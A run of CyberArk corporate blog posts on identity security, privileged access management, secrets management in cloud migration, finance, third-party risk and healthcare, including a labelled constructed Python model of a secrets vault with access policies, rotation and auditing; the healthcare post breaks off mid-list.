Embracing the shift toward a more secure digital environment, CyberArk’s QuickStart framework offers a streamlined approach to identity security that now extends to macOS users. Read our comprehensive whitepaper to learn about QuickStart, a rapid risk reduction and least privilege framework available in CyberArk Endpoint Privilege Manager. The framework can help reduce the attack surface on endpoints and servers and lay the foundation for role-based least privilege policies in just a couple of clicks.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

Serving Secure Access: Inside the Privileged Access Ice Cream Parlor
https://www.cyberark.com/blog/serving-secure-access-inside-the-privileged-access-ice-cream-parlor/
Mon, 01 Jul 2024 16:20:10 +0000

Imagine standing in your favorite ice cream parlor, gazing at myriad flavors chilling behind the counter. The choices are tantalizing, from traditional vanilla and chocolate to a swirl of the two. Ice cream flavors have evolved from these bases into cookies and cream, mint chocolate chip, Neapolitan, birthday cake, Rocky Road, butter pecan and coffee – you get the picture.

Ice cream is a lot like privileged access management (PAM) solutions. Both rely on foundational elements: vaulting and rotating credentials, isolating high-risk sessions and auditing actions taken with privileged accounts. These controls, like vanilla and chocolate, are essential for a successful, scalable PAM program.

But what happens when the basics no longer suffice?

Just as ice cream comes in multiple flavors, building a PAM solution that fits your organization’s needs can help reduce the attack surface as your ecosystem expands.

Scooping the Basics: PAM’s Fundamental Flavors

In the world of ice cream, as in PAM, the classics serve as the cornerstone for creativity. Vanilla, chocolate and swirl are not just timeless favorites; they are the essential foundations upon which all other flavors are built. Similarly, in any PAM practice, the basics of vaulting credentials, rotating them regularly and isolating and monitoring privileged sessions are the bedrock upon which a secure and scalable program is constructed. Let’s scoop into the details:

  • Password Vaulting: It’s a classic favorite, like vanilla ice cream. It ensures that privileged account credentials are securely stored and managed, preventing unauthorized access and reducing the risk of credential theft.
  • Credential Rotation: Chocolate ice cream and credential rotation are timeless. Regularly changing privileged account passwords mitigates risks associated with compromised credentials.
  • Session Monitoring and Isolation: Combining vanilla and chocolate into a swirl, session monitoring and isolation provide visibility into privileged sessions, allowing organizations to monitor activities and isolate risky or unauthorized actions.

These foundational privilege controls are crucial but are just the beginning of a holistic PAM solution. Just as chocolate and vanilla can be enjoyed on their own, these basics lay the groundwork for modernizing a PAM strategy with additional “flavors.”

The diagram below represents how foundational and modern PAM controls come together to optimize privilege controls beyond built-in, vaulted credentials.

[Diagram: PAM controls with access]

Sprinkling in Innovation: PAM’s Modern Flavors

Just as the classic flavors of vanilla, chocolate and swirl lay the groundwork for an endless variety of ice cream experiences, the foundational components of PAM – password vaulting, credential rotation and session monitoring – set the stage for a more sophisticated suite of security features. As we delve into the modern PAM flavors, we’ll discover how these essential elements evolve to meet the complex demands of today’s threat landscape. These flavors (aka components) are:

  • Expanded Scope and New-Environment Coverage (Cookies and Cream): Just as cookies and cream adds texture and complexity to vanilla, modern PAM solutions secure access not only to traditional systems but also to cloud workloads, DevOps tools, robotic process automation (RPA) and internet of things (IoT) devices.
  • Modern Session Management and Monitoring (Cookie Dough): Advanced session management and monitoring features, akin to cookie dough ice cream, take privileged access visibility to new heights with keystroke logging, video recording and real-time session monitoring.
  • Robust Risk Analytics and Reporting (Rocky Road): Like Rocky Road, which combines chocolate, marshmallows and nuts for complexity, modern PAM solutions offer robust risk analytics and reporting capabilities, analyzing user behavior and detecting potential threats.
  • Seamless Integration and Automation (Mint Chocolate Chip): Mint chocolate chip blends refreshing mint with decadent chocolate chips. Similarly, seamless integration and automation features in PAM solutions streamline operations and reduce human error by integrating with other security tools.
  • Support for DevOps and Agile Methodologies (Strawberry Cheesecake): Just as strawberry cheesecake combines unique flavors, modern PAM solutions support DevOps and agile methodologies with features like just-in-time (JIT) access provisioning and automated secrets management.
  • Scalability and Flexibility (Neapolitan): Neapolitan ice cream offers three flavors in one package. Modern PAM programs provide scalability and flexibility, supporting large-scale deployments and hybrid and multi-cloud environments.

A modern PAM program combines foundational aspects with modernized features, holistically reducing risk and managing privileged access. Like ice cream, PAM is versatile and should be integrated into various security strategies.

The PAM Sundae: A Staple Security Treat

As we layer our PAM Sundae with a variety of security measures, let’s explore the key components that make up this complete treat. Each element not only adds its own unique flavor but also enhances the overall protection, just like the perfect blend of toppings on a sundae. Here’s a taste of what makes our PAM strategy so satisfying:

  • Securing Developers (Apple Pie à la Mode): Just as Apple Pie à la mode elevates a classic dessert, PAM solutions secure developer access to critical systems, managing secrets and integrating with DevOps tools.
  • Secrets Management (Milkshake): A milkshake becomes indulgent with ice cream, just as modern PAM programs enhance security with robust secrets management for API keys, database credentials and encryption keys.
  • Remote Access Management (Affogato): An affogato combines hot espresso and ice cream. Similarly, modern PAM solutions provide secure remote access for contractors and third-party users, enforcing least-privilege principles.
  • Machine Identity Management (Banana Split): Like a banana split combines multiple flavors and toppings, machine identity management in PAM secures public key infrastructure, server certificates, SSH keys and other non-human credentials.
  • Endpoint Privilege Management (Baked Alaska): Baked Alaska combines sponge cake and ice cream in a meringue shell. Endpoint privilege management in PAM controls administrative rights and applications while enforcing least privilege policies on endpoints.
  • Workforce Identity Management (Ice Cream Sandwich): Ice cream sandwiches are convenient and delicious. PAM solutions integrate with workforce identity management to secure access for employees, contractors and third-party users to ensure security for all identities inside and outside of the organization.

PAM Delights: The Cherry on Top of Security

Modernizing your PAM practice involves securing built-in admin accounts with vaulting and rotating credentials and extending these controls to federated access and roles with JIT access models, zero standing privileges (ZSP) and web session protection. Including secrets management, enforcing least privilege on workstations and servers, managing machine and non-human identities and securing the workforce are essential for a comprehensive modern PAM program.

To wrap up our journey through the Privileged Access Ice Cream Parlor, we’ve savored a variety of PAM flavors that together create a robust security strategy. From the solid base of password vaulting and credential rotation to the delightful toppings of advanced session management and risk analytics, each element adds its own singular flavor to the mix. Like a sundae without a cherry on top, a comprehensive PAM program isn’t complete without integrating workforce identity management and securing the workforce. It’s the final touch that brings all the flavors together, creating a treat that’s not only irresistible but also ensures that every scoop is secure.

Ryne Laster is a product marketing manager at CyberArk.

Identity Security: The Keystone of Trust
https://www.cyberark.com/blog/identity-security-the-keystone-of-trust/
Tue, 25 Jun 2024 15:39:39 +0000

A few weeks ago, my wife asked me why stopping threat actors from impacting our lives is so difficult. In this digital age, the necessity to connect online brings inherent exposure to vulnerabilities. The challenge for you as a security leader lies in reducing the sense of vulnerability by building trust. You need to protect your organization and reassure employees so they can perform their jobs without fear.

Whether you are a chief information security officer (CISO) with the best security solutions available or an identity and access management (IAM) leader with just enough security practices, the effectiveness of any security program is limited without the trust of the organization’s stakeholders. Trust is the cornerstone for achieving higher security maturity.

Take, for example, the credit card anti-fraud teams that call to verify suspicious purchases. Regardless of the explanation, customers feel protected when anti-fraud teams contact them and continue to trust and use their cards. Similarly, security leaders must cultivate the trust of stakeholders and end users to reduce their sense of cyber vulnerability and foster digital progress.

Cultivating Trust: Leadership Principles in Action

In a digital era marked by increasing connectivity and threats, the roles of CISOs and other security decision-makers have evolved beyond implementing security technologies to building fundamental trust within their organizations. According to the CyberArk 2024 Identity Security Threat Landscape Report, 93% of organizations have experienced identity-related security breaches in the past year, underscoring the importance of trust in the organization’s security program.


In addition to the right level of privilege controls, intelligently applied, you can help improve your organization’s identity-focused security by embracing the principles of authenticity, logic and empathy. These foundational elements, inspired by insights from the Harvard Business Review, are crucial for building a resilient trust framework. By embracing these principles, you can present identity security as more than a technical solution. Instead, it becomes a strategic narrative that strengthens trust with stakeholders and users, ensuring comprehensive protection for all business operations.

Leadership in cybersecurity goes beyond managing security practices and incorporates human skills that build trust, anticipate risks and assure user-centric security. A leader’s job is to shape the organization’s mindset toward cybersecurity. With that in mind, the three principles mentioned above help develop credibility, make educated decisions and connect security processes with user needs.

Let’s explore the three principles that help in building trust in your cybersecurity program:

1. Authenticity: Building Credibility Through Consistent Behavior

Authenticity in cybersecurity leadership means acting as your organization’s genuine protector and strategic advisor. It involves transparent communication about the security posture, proactive sharing of risks and defenses and a visible commitment to the organization’s best interests. Authentic leaders build credibility and trust, which are essential for effective leadership in times of crisis.

2. Logic: Making Informed Decisions

Logical decision-making is crucial in cybersecurity. This principle relies on data and analytics to understand threats and plan effective countermeasures. Validate your strategies through evidence; this strengthens your authority and earns stakeholders’ trust in the decisions you make when prioritizing security initiatives. For instance, cyberthreat intelligence provides valuable insights into imminent threats, attack patterns and vulnerabilities, equipping you to make informed decisions based on the wider context around the organization. This way, you can ensure that your strategy is proactive, relevant and risk-based in addressing a constantly evolving threat landscape.

3. Empathy: Aligning Security with User Needs

Empathy in leadership involves recognizing and addressing user concerns about security measures. As an empathetic leader, you should ensure that security protocols do not overburden users and that these measures align with the everyday experiences and expectations of those they aim to protect. This approach promotes user engagement and compliance, which are integral to a successful security strategy.

Securing Identity: Authentic, Logical, Empathetic Trust Building

Now that I’ve laid out these leadership principles, the next step is to weave them into everyday practice. For example, identity security can strengthen the perception that our digital environment is safeguarded by requiring strong authentication for online transactions and by continuously monitoring user sessions (Zero Trust). Finally, as important as the technology and processes is understanding the user’s needs, so that the right level of security can be applied without interfering with their daily work.

Perception is as crucial as reality when it comes to honesty – it’s vital to be truthful and recognized as such. In other words, our stakeholders and end users should clearly understand why certain controls are necessary and how data is secured to make it easier for users to accept and follow the designed security practices. For instance, strong identity security is critical for defending against unwanted access and ensuring that only legitimate individuals may access sensitive data and systems. Techniques such as multi-factor authentication (MFA), biometric verification and behavioral analytics are essential components of a solid identity security strategy that you should incorporate into your plan to develop and maintain trust.

Fostering Confidence with Proactive Security: The Zero Trust Paradigm

Building trust through Zero Trust may seem contradictory at first. However, in essence, a Zero Trust strategy advocates giving the appropriate amount of trust for the right task at the right time. It eliminates implicit trust and implements security measures to prevent privilege abuse and security breaches.

Adopting a Zero Trust approach means assuming that no entity inside or outside the infrastructure is inherently trusted. This approach complements the principles of:

  • Authenticity – by enforcing consistent verification, showcasing a transparent security commitment.
  • Logic – by systematically applying strict access controls based on continuous assessment of risks and behaviors.
  • Empathy – by ensuring security measures do not impede user productivity or experience.

Empowering Leaders: Advancing Zero Trust with Identity Security

People follow a leader because they have faith in that leader’s ability to make the best decisions for them. Within Zero Trust, the defensible strategy is to start with identity security, which sits at the center of the “trust but always verify” approach.

Enhancing Authenticity Through Biometrics and MFA

Biometric authentication and MFA strengthen authenticity by proving the organization’s dedication to protecting identity at every access point. These technologies make the security process visible and understandable to users, enhancing trust in the measures implemented.

Supporting Logical Decision-Making with AI and Analytics

Artificial intelligence (AI) and analytics can assess risks in real time and adjust security measures dynamically. This technology application supports logical leadership by making more efficient and effective data-driven decisions, showcasing a commitment to sophisticated, reasoned security practices.

Empathy through User-Centric Security Designs

Security designs that consider user convenience, such as adaptive authentication methods that adjust security based on behavior and risk, show empathy. These designs reflect that the organization values user experience alongside security, fostering trust and cooperation from users.

Building Trust: Leadership and Zero Trust Synergy in Identity Security

Returning to my wife’s original question about stopping threat actors, the answer is that we need to be cautious online and promote a security culture that doesn’t get in the way of living our lives the way we want, a life that now also takes place in cyberspace. To achieve this, we must cultivate a risk-tolerant mindset that empowers us to make prudent, risk-aware decisions.

In today’s complex cybersecurity landscape, a security leader’s effectiveness centers not just on the security technologies you deploy but significantly on the trust you build. By adhering to authenticity, logic and empathy and integrating sophisticated identity security measures within a Zero Trust framework, you can ensure your organization is protected and trusted by all stakeholders.

Claudio Neiva is CyberArk’s Security Strategic Advisor, Director (LATAM).

Cloud Migration Simplified: SaaS Secrets and PAM Strategy
https://www.cyberark.com/blog/cloud-migration-simplified-saas-secrets-and-pam-strategy/
Fri, 21 Jun 2024 12:45:10 +0000

In the era of rapid digital transformation, organizations are prioritizing cloud transformation projects to enhance their operational agility, scalability and cost efficiency. However, this shift takes time and brings significant challenges, particularly in security and identity management. As businesses strive to innovate and keep pace with the competitive landscape, they often accumulate cyber debt – the buildup of security liabilities and risk debt due to delayed software maintenance or outdated security enhancements.

Many large organizations maintain a combination of cloud and traditional infrastructure because they cannot easily migrate or replace certain on-premises infrastructure and applications with cloud-native or SaaS solutions without incurring significant costs or risks to the business. So, a phased migration is the best way to address the complexities and risks associated with cloud transformation.

Cloud Transformation Security Challenges

The CyberArk 2024 Identity Security Threat Landscape Report highlights several critical security challenges associated with digital transformation and the migration to the cloud, focusing on managing and securing identities, particularly machine identities. Key findings and issues identified in the report include:

Digital Transformation and Identity-Related Attacks

  • Top source of attacks: Digital transformation is identified as the leading source of identity-related attacks, presenting significant security challenges for organizations transitioning to cloud environments.
  • Increased attack surface: Cloud migrations expand the attack surface, creating more entry points for potential attacks and making it harder to secure all aspects effectively.

Privileged Machine Identities

  • Prevalence of privileged access: 68% of respondents indicate that most of their machine identities have privileged access. These identities, encompassing applications, services and automated processes, require high-level permissions to operate.
  • Risk of unauthorized access: Privileged machine identities are attractive targets for attackers due to their access to sensitive data and critical systems. Compromise of these identities can result in severe security breaches.

Growth of Machine Identities

  • Machine identities: Leading the surge in identity security needs, driven by the proliferation of automation and microservices in cloud environments.

Operational and Compliance Challenges

  • Operational risks: Inadequate management of secrets and access credentials across diverse cloud environments can lead to inconsistent security policies and weak access controls, increasing the likelihood of security incidents.
  • Compliance challenges: Ensuring compliance with various regulatory requirements is complex in a cloud environment. Organizations must implement effective monitoring, auditing and reporting mechanisms to meet these obligations.

A Phased Cloud Migration Path

Most machine identities have privileged access, and the number of these non-human identities is only growing as automation, AI, cloud and other productivity enhancements become even more widely used. Since machine identities are closely associated with newer technology, it makes sense to start migrating your machine identity security to a centralized SaaS secrets management solution that integrates with your privileged access management (PAM) self-hosted solution and uses the credentials you already manage.

Organizations face increased operational risks and compliance challenges without proper management of machine identities. The complexity of managing secrets across diverse environments can lead to inconsistent security policies, weak access controls and an increased likelihood of security incidents.

Taking a phased approach and starting with SaaS secrets management offers a streamlined and centralized way to manage identities for humans and machines across cloud-native applications, multi-cloud environments and on-premises systems without disrupting your PAM self-hosted solution. This approach provides several key benefits that can significantly alleviate the burden of cyber debt:

  1. Centralized administration and automation: SaaS secrets management platforms provide a unified interface for managing secrets that integrate with your PAM self-hosted solution, simplifying administration and reducing human error risk. Automation capabilities regularly rotate and update secrets for long-standing accounts and use dynamic secrets for ephemeral accounts to minimize the risk of compromised credentials.
  2. Enhanced security and compliance: By centralizing secrets management, organizations can enforce consistent security policies and gain comprehensive visibility into how secrets are used and accessed – e
  3. Scalability and flexibility: SaaS solutions scale with an organization’s needs and accommodate the dynamic nature of cloud environments by design. They support a wide range of integrations with cloud platforms, DevOps tools and CI/CD pipelines, enabling security to be seamlessly embedded into development workflows without hindering productivity.
  4. Reduced complexity and cost: Managing secrets in a multi-cloud environment can be complex and costly. SaaS secrets management solutions reduce these complexities by providing a cloud-agnostic approach that avoids vendor lock-in and enables organizations to manage secrets uniformly across cloud services and on-premises systems.

Best Practices for SaaS Secrets Management Integration

When implementing a SaaS secrets management solution, organizations should consider the following best practices:

  • Comprehensive discovery and onboarding of cloud vaults: Conduct a thorough discovery of all existing secrets and credentials across the and machine identities. Onboarding these secrets into the SaaS platform should be a structured and phased approach to ensure minimal disruption. Security teams need comprehensive visibility and insights into the organization’s secrets stores managed by the cloud service providers (e.g., AWS Secrets Manager (ASM) and Azure Key Vault).
  • Policy-driven access control: Implement fine-grained access controls based on the principle of least privilege. Use policy-driven frameworks to define and enforce who can access specific secrets and under what conditions.
  • Integration with existing solutions: Ensure the secrets management solution integrates seamlessly with your existing PAM solution (self-hosted or SaaS), DevOps and security tools. This enables automated workflows and continuous security without adding friction to development processes.
  • Continuous monitoring and auditing: Use the SaaS platform’s monitoring and auditing capabilities to gain insights into secret usage. Continuous auditing helps identify anomalies and potential security threats, enabling timely interventions.
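A constructed model, added here and not CyberArk’s own code, that ties together the benefits listed earlier and these best practices in one place: policy-driven least-privilege reads (principal, secret pattern, environment, time window), an automated rotation sweep for long-standing secrets, TTL-bound dynamic secrets for ephemeral use and an audit trail of every read attempt for anomaly review. All principal names, secret paths, patterns and values are assumptions made for the example.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from fnmatch import fnmatch
from typing import Optional
import secrets as randsecrets


@dataclass
class Secret:
    value: str
    created: datetime
    max_age: timedelta               # long-standing secrets must rotate before this age
    ttl: Optional[timedelta] = None  # set only for dynamic (ephemeral) secrets

    def expired(self, now):
        return self.ttl is not None and now >= self.created + self.ttl

    def rotation_due(self, now):
        return self.ttl is None and now >= self.created + self.max_age


@dataclass
class Policy:
    principal: str              # human or machine identity, e.g. "ci-runner" (constructed)
    secret_pattern: str         # glob over secret names, e.g. "prod/db/*"
    environments: frozenset     # environments the caller may read from
    hours_utc: tuple = (0, 24)  # allowed [start, end) hour window in UTC


@dataclass
class Vault:
    secrets: dict = field(default_factory=dict)
    policies: list = field(default_factory=list)
    audit: list = field(default_factory=list)  # (event, principal, secret, result, time)

    def add_static(self, name, value, now, max_age_days=90):
        self.secrets[name] = Secret(value, now, timedelta(days=max_age_days))

    def issue_dynamic(self, name, now, ttl_minutes=15):
        # A dynamic secret is minted on demand and simply expires; it is never rotated.
        token = randsecrets.token_urlsafe(24)
        self.secrets[name] = Secret(token, now, timedelta(0), timedelta(minutes=ttl_minutes))
        return token

    def rotate_due(self, now):
        # Automated rotation sweep for long-standing secrets past their maximum age.
        due = [n for n, s in self.secrets.items() if s.rotation_due(now)]
        for n in due:
            self.secrets[n].value, self.secrets[n].created = randsecrets.token_urlsafe(24), now
            self.audit.append(("rotate", "vault", n, "ok", now))
        return due

    def _deny_reason(self, principal, name, env, now):
        s = self.secrets.get(name)
        if s is None:
            return "unknown-secret"
        if s.expired(now):
            return "expired"
        reason = "no-policy"  # least privilege: deny unless a policy explicitly allows
        for p in self.policies:
            if p.principal != principal or not fnmatch(name, p.secret_pattern):
                continue
            if env not in p.environments:
                reason = "environment"
            elif not (p.hours_utc[0] <= now.hour < p.hours_utc[1]):
                reason = "time-window"
            else:
                return None  # this policy grants the read under these conditions
        return reason

    def get(self, principal, name, env, now):
        # Every read attempt is recorded, allowed or not, so anomalies can be reviewed.
        reason = self._deny_reason(principal, name, env, now)
        self.audit.append(("read", principal, name, reason or "allow", now))
        return None if reason else self.secrets[name].value

    def denied_events(self):
        return [e for e in self.audit if e[0] == "read" and e[3] != "allow"]


def demo():
    # Constructed scenario: a 100-day-old database password past its 90-day rotation age,
    # a CI runner allowed in prod only, and an analyst limited to business hours.
    now = datetime(2024, 7, 1, 12, 0, tzinfo=timezone.utc)
    v = Vault()
    v.add_static("prod/db/password", "constructed-initial-value", now - timedelta(days=100))
    v.policies += [Policy("ci-runner", "prod/db/*", frozenset({"prod"})),
                   Policy("ci-runner", "prod/ci/*", frozenset({"prod"})),
                   Policy("analyst", "prod/db/*", frozenset({"prod"}), (9, 17))]
    rotated = v.rotate_due(now)
    allowed = v.get("ci-runner", "prod/db/password", "prod", now)
    wrong_env = v.get("ci-runner", "prod/db/password", "dev", now)
    no_policy = v.get("app-dev", "prod/db/password", "prod", now)
    after_hours = v.get("analyst", "prod/db/password", "prod", now.replace(hour=22))
    token = v.issue_dynamic("prod/ci/session", now)
    fresh = v.get("ci-runner", "prod/ci/session", "prod", now + timedelta(minutes=5))
    stale = v.get("ci-runner", "prod/ci/session", "prod", now + timedelta(minutes=16))
    return {"rotated": rotated, "value_changed": allowed != "constructed-initial-value",
            "allowed": allowed is not None, "fresh_ok": fresh == token,
            "denied_values": [wrong_env, no_policy, after_hours, stale],
            "denied_reasons": [e[3] for e in v.denied_events()]}
```

Running `demo()` shows the rotation sweep replacing the stale password, the CI runner reading it only from the allowed environment, and each denied read landing in the audit trail with its reason.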

By addressing these challenges through strategic approaches and advanced security solutions, organizations can better secure their cloud environments against identity-related threats and ensure a more secure digital transformation.

Starting Your SaaS Journey with Secrets Management

As organizations strive to innovate and remain competitive, the accumulation of cyber debt poses significant risks. SaaS secrets management offers a powerful solution to these challenges, providing centralized, scalable and secure management of secrets across diverse environments. By taking a phased approach and adopting SaaS secrets management, organizations can reduce their cyber debt, enhance security and achieve their cloud transformation goals more efficiently while positioning the organization to adapt to future challenges with confidence and resilience.

cyber debt is critical in the cloud transformation journey. Ensure identity security is at the forefront of your software development with insights from the new “Identity Security for Software Development” book by O’Reilly Media and CyberArk. This early-release eBook collaboration offers a blend of theory and practice to protect against the risks of cyber debt in our evolving digital landscape. And be sure to check out our upcoming webinar, “How to Build a Developer-First Cloud Security Program,” on July 9, where I’ll be previewing content from the book.

John Walsh is a senior product marketing manager at CyberArk.

Financial Highwire: The Critical Role of Identity Security in Finance
https://www.cyberark.com/blog/financial-highwire-the-critical-role-of-identity-security-in-finance/
Tue, 18 Jun 2024 20:32:28 +0000

In the highwire act of the financial services sector, identity security serves as the essential safety net, meticulously engineered to intercept any missteps before they precipitate a fall. Just as a tightrope walker relies on a safety net for confidence at dizzying heights, financial institutions – from global companies and insurers to community banks and credit unions – navigate a complex array of risks. They trust in identity security to maintain balance and confidence amid the intricacies of digital banking transactions and financial data exchanges.

Identity Security in Today’s Financial Sector

As the tightrope of digital finance stretches further, carrying more data and transactions than ever, the need for an unshakeable safety net becomes paramount, as 93% of organizations faced two or more identity-related breaches in the past year. This net doesn’t just catch falls; it instills the confidence to push forward, innovate and engage with customers securely and effectively.

A Strategic Framework for Strengthened Identity Security

To ensure the financial sector’s safety net is both resilient and responsive, consider these six foundational elements to enhance identity security and future-proof against growing cyber risks:

  1. Dynamic access management. Fine-tune your safety net by ensuring that only the right entities have access at the right times. This requires balancing user convenience and stringent security measures to prevent unauthorized access.
  2. Intelligent privilege controls. Strengthen the fibers of your net with smart controls that protect IT administrators, for example by introducing a zero standing privileges approach to access management. Tightly controlling access privileges minimizes the risk of breaches while allowing your team the flexibility to perform their roles effectively.
  3. Unified identity orchestration. Weave a stronger net by integrating and managing all identity processes from a central point. This can help catch discrepancies and potential threats before they can cause harm.
  4. Proactive threat detection. Equip your safety net with sensors that can feel the slightest tremor of threat, allowing immediate action. Continuous monitoring and real-time analysis are crucial to swiftly detecting and mitigating threats.
  5. Comprehensive identity mapping. Make every part of your safety net visible and accounted for by mapping out all human and machine identities. Knowing who and what is on your network is crucial for maintaining security.
  6. Adaptive authentication. Modify the tension in your net according to the conditions with context-sensitive, adaptive multi-factor authentication (MFA) that responds dynamically to varying threat levels, enhancing security without compromising the user experience.

Beyond Compliance: Elevating the Safety Standards

While compliance frameworks like SWIFT CSCF, Sarbanes-Oxley (SOX), 23 NYCRR 500 and DORA provide a regulatory framework for setting up the safety net, true security leadership in the global financial sector involves cooperation to weave a net that’s ahead of the curve – anticipating risks and reinforcing points of vulnerability before they are tested.

For cybersecurity professionals in finance, this is your moment to ensure that the safety net you create is compliant and a cutting-edge model for others to follow. By embedding these six strategic pillars into your identity security practices, you protect assets and build a culture of security-first thinking across the organization.

A Confident Approach to Financial Identity Security

Embrace this holistic approach to identity security to ensure your financial operations can perform confidently on the highwire of modern finance. By strengthening your own company’s safety net, you protect not only your data and transactions but also the trust and confidence of your customers. Implement these strategies to stay agile and secure in a world where the stakes are as high as the rewards.

Let’s consider Rabobank’s experience to illustrate these concepts in action. With automated password management, privileged access and activity monitoring for 10 million customers across 48 countries and 59,000 employees, Rabobank International has significantly reduced risk and established a transparent overview of accountability.

As the landscape of financial security continues to evolve, establishing robust identity security protocols is a necessity and a strategic advantage. By adopting these principles, your organization can not only navigate the challenges of today but also pave the way for a secure and prosperous future in the digital age.

Chris Maroun is a senior director in CyberArk’s field technology office.

]]>
CIO POV: Building Resilience in a Complex Threat Landscape https://www.cyberark.com/blog/cio-pov-building-resilience-in-a-complex-threat-landscape/ Wed, 12 Jun 2024 16:07:34 +0000 https://www.cyberark.com/?p=192452

As a CIO, I often wish for a world where the threat landscape is less expansive and complicated than it is today. Unfortunately, the reality is quite different. This month, I find myself particularly focused on the idea that our digital business would come to a grinding halt without the technology ecosystem that supports it. However, this very ecosystem also presents significant risks.

This month, I’m thinking quite a bit about issues that pertain to the intricate web of potential vulnerabilities our collective digital ecosystem faces. The digital ecosystem brings several advantages, such as shifting the heavy lifting of the back-end infrastructure to a SaaS vendor, getting a best-in-class solution that you couldn’t develop yourself, and helping us focus on our mission-critical domains. The same digital ecosystem also presents imminent downsides. The threats posed by your third-party providers are compounded by the risks their providers (your fourth parties) present. This creates an intricate, ever-expanding web of potential vulnerabilities. Each new technology brings additional layers of partners and added risks. Additionally, increasing cyber debt and persistent threats like ransomware are constant concerns.

New Technologies: Uncovering the Hidden Risks and Blind Spots

As we navigate the complexities of our digital ecosystem, it becomes increasingly apparent that the innovations we embrace can also introduce new vulnerabilities. These are not just hypothetical risks; they are the tangible issues we’ve touched upon earlier, manifesting as third and fourth-party risks, cyber debt and the persistent threat of ransomware.

In the spirit of addressing these challenges head-on, let’s further examine the specific areas that demand our vigilant focus:

1. Chain Reaction Risks in Your Digital System

If you’re already losing sleep over cybersecurity, you can be sure to lose even more over the risks your partner’s partners present. The deepening relationships with technology partners enable our digital businesses, but every new provider you integrate into your ecosystem exponentially increases your risk.

I’m confident that every third-party provider you onboard is vetted for risks. But do you apply the same scrutiny to your fourth parties (your third-party providers’ providers)? How many third- and fourth-party providers is your organization actively working with? Let me share some insights.

CyberArk’s 2024 Identity Security Threat Landscape Report indicates that 84% of organizations expect to employ three or more cloud service providers (CSPs), consistent with 85% last year. Moreover, our respondents anticipate an 89% increase in the number of software-as-a-service (SaaS) providers in the next 12 months, up from 67% in the 2023 report. Consider the footprint of your digital ecosystem. Your extended family of third-party providers includes service providers, integrators, hardware and infrastructure suppliers, business partners, distributors, resellers and telecommunications providers. External to your organization, these entities are crucial for enabling your digital business.

Do you have visibility into all your third-party providers’ security practices? What about your fourth-party providers? Does your organization actively measure and mitigate the risks posed by your third- and fourth-party providers? It’s implied in these questions, but I’ll say it anyway: you should be doing all these things.

2. Cyber Debt is Real

You’ve probably heard of tech debt, which results from prioritizing speed to market over a robust and agile technology environment. In today’s landscape, tech debt is amplified by cyber debt. Consider the accumulated risks and vulnerabilities within your IT infrastructure due to neglected updates, lack of tools, or too many disparate tools, coupled with a shortage of skilled cybersecurity staff. It’s a recipe for disaster, and cybercriminals thrive on it.

The proof is in our survey findings. Breaches due to phishing and vishing attacks have impacted nine out of ten organizations. Nearly the same number of organizations were targeted by ransomware in 2024 (90%) as in 2023 (89%), with an increasing number reporting irretrievable data loss. With bad actors utilizing generative artificial intelligence (GenAI) to scale sophisticated attacks, we should anticipate that every organization will be breached in the coming years. This is a reality every CISO must brace for.

3. Ransomware is Still a Thing

Ransomware remains a significant threat, with no honor among thieves. Despite our hopes for a world free of ransomware, the truth is that old threats are enduring, and humans are the weakest link. Ransomware will continue to grow in volume and sophistication, especially with AI-enabled deepfakes. No amount of cybersecurity awareness training can completely prevent a user from clicking a malicious link or sharing a one-time password (OTP), compromising their identity and the organization’s data.

The damage caused by ransomware is severe. Our findings reveal that 75% of organizations impacted by ransomware paid the ransom but did not recover their data. However, protecting against ransomware doesn’t have to be as challenging as climbing Mount Everest. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) offers several no-cost resources to help you proactively protect your organization against ransomware. I highly recommend taking advantage of these resources.

Building a Resilient Digital Defense Against Emerging Threats

Although a day in the life of a CISO may seem grim, it’s not all doom and gloom. My peers in the industry will agree that we successfully protect against threats frequently, but a single breach can leave a lasting mark. I advise everyone to thoroughly review their IT environments, scrutinizing gaps and prioritizing remediation. This process needs to be ongoing and methodical, performed at regular intervals.

While we must anticipate and mitigate the risks of new technologies like GenAI, we cannot ignore the persistent threats of traditional vulnerabilities. Simplistically, I recommend three actions:

1. Audit and evaluate all legacy and new technologies across your environment. You must conduct an annual vendor assessment, which evaluates and prioritizes the critical vendors that might pose a high risk for your business. You can use specific tools for external security scoring and put specific liability phrases in the contracts. You should also ensure that access to your systems includes secure authentication and that the exposed data is only what is required.

2. Assess the risks these disparate tools pose versus the time and effort required to maintain them. I recommend a dedicated cadence for discussing cyber risk management and reviewing outcomes, including a toolset to reduce third-party risks.

3. Create a plan to consolidate your technology stack based on the right balance for your organization. Proceed slowly but surely. As a CIO, I can confidently say that the platformization movement is real. It’s not just a way to reduce overall costs but also a means to mitigate third-party risks. If you have a trusted vendor that you’re continuously reassessing from a cyber risk perspective, it will eventually get you to a more secure posture. Just don’t put all your eggs in one basket.

I am already implementing these strategies. Are you?

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

]]>
Securing a Lifeline: Why Identity Security is Paramount in Healthcare https://www.cyberark.com/blog/securing-a-lifeline-why-identity-security-is-paramount-in-healthcare/ Thu, 06 Jun 2024 18:42:52 +0000 https://www.cyberark.com/?p=191886

In the intricate healthcare ecosystem, cybersecurity is akin to the human immune system – a vital defense that safeguards the body from external and internal threats. Healthcare cybersecurity is essential for protecting patient data, ensuring medical service availability and maintaining compliance across the medical industry. The future of healthcare is increasingly digital, and its security depends on the strength of identity security measures. Identity security is the defense against data breaches and unauthorized access. By ensuring that only the right person has the right access at the right time, identity security helps secure data and empowers healthcare providers.


The Heart of Healthcare Cybersecurity: Identity Security

Identity security is a vital defense mechanism, like how the immune system protects the human body. It ensures appropriate access for authorized personnel through various safeguards, crucial for protecting against cyberthreats in an industry vulnerable due to its high-value data and extensive IT reliance. It plays a fundamental role in tackling challenges, ensuring the system’s overall health and integrity through the following essential functions:

  1. Establishing Patient Trust
    Patient trust in the healthcare industry is arguably as vital as a healthy heart in a living body. What isn’t arguable, however, is the need to guard sensitive health information precisely and carefully. Identity security plays a crucial role by tightly controlling access to sensitive data, thereby helping preserve the confidentiality, integrity and availability of patient information. This secure management is critical for maintaining patient trust and compliance with stringent regulations like HIPAA.
  2. Enhancing Operational Efficiency
    Just as the circulatory system efficiently delivers blood to where it’s needed most, identity security solutions streamline healthcare authentication and authorization processes. These solutions ensure that healthcare providers have timely yet secure access to crucial patient information, optimizing workflows while guarding against unauthorized access.
  3. Supporting Innovative Technologies
